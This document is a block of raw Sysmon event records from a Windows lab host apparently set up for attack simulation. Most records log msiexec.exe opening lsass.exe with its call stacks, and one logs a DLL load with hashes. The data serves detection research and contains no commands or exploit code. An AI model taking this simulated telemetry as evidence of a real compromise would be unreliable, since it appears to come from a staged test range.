\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695257Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695256Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695255Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695254Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695253Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695252Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695251Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695250Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695249Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695248Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695247Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695246Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695245Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695244Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695243Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695242Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695240Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695238Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695237Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695235Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695234Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-9826-62AC-366B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695233Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695232Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 